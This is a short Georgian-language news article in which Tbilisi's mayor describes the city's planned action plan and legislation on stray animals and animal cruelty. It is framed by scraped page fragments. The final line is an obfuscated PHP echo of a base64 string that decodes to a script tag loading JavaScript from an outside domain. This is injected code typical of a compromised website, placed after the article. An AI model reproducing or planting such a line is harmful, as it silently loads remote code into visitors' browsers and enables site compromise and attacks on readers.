celsiusi
ავერსი შნაიდერი
დედაქალაქის მერია მიუსაფარ ცხოველებთან დაკავშირებით სამოქმედო გეგმას უახლოეს მომავალში წარადგენს, – ამის შესახებ თბილისის მერმა, კახა კალაძემ შესაბამისი კითხვის საპასუხოდ განაცხადა და დედაქალაქში მიუსაფარი ცხოველების მართვის გეგმაზე ისაუბრა.
 
მისივე თქმით, მერიამ უკვე გადადგა ქმედითი ნაბიჯები მიუსაფარი ცხოველების სასტიკ მოპყრობასთან დაკავშირებული კანონპროექტის ინიცირების თვალსაზრისით და აღნიშნულ საკითხზე კომპლექსურ მუშაობას, არასამთავრობო სექტორთან ერთად, მომავალშიც აქტიურად განაგრძობს.
 
„დედაქალაქის მერია იყო ინიციატორი კანონის გამკაცრებასთან დაკავშირებით. ჩვენ ვიყავით ინიციატორები, წარვადგინეთ კანონპროექტი და პარლამენტმა მას მხარი დაუჭირა. კანონი ეხება იმას, რომ ცხოველების უხეში მოპყრობა, ცემა, დაზიანება, მოკვლა სისხლის სამართლის დანაშაულია და ამას შესაბამისი უწყებები აღასრულებენ“, – აღნიშნა კახა კალაძემ.
 
რაც შეეხება ზოგადად მიუსაფარ ცხოველებს, თბილისის მერის განცხადებით, ამ მიმართულებით, კომპლექსური სამუშაოებია ჩასატარებელი, რომლისთვისაც მუნიციპალიტეტი მზადაა.
 
„ეს პრობლემა ბევრ ადამიანს აწუხებს. შევქმენით სამუშაო ჯგუფი, გვქონდა შეხვედრები არასამთავრობო სექტორთან, ვინც ამ საკითხზე მუშაობს და უახლოეს მომავალში საზოგადოებას მათთან ერთად, კონკრეტულ გეგმას წარვუდგენთ, თუ რა უნდა გაკეთდეს, თავისი საკანონმდებლო ცვლილებებით. კონკრეტული პროექტი ვერ განხორციელდება, თუ საკანონმდებლო ცვლილებები არ იქნა მხარდაჭერილი იგივე ცხოველების გამრავლებასთან, არსებული მდგომარეობის მოწესრიგებასთან, თავშესაფრების პროექტების განხორციელებასთან დაკავშირებით. კომპლექსური სამუშაოებია ჩასატარებელი. მზად ვართ, მომავალი წლიდან კონკრეტული თანხები გამოიყოს პროექტის დასაფინანსებლად, იმისთვის, რომ დროთა განმავლობაში, აღნიშნული პრობლემა მოგვარდეს ცივილურად, როგორც ეს განვითარებულ, ევროპულ ქვეყნებშია“, – განაცხადა კახა კალაძემ.
449
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");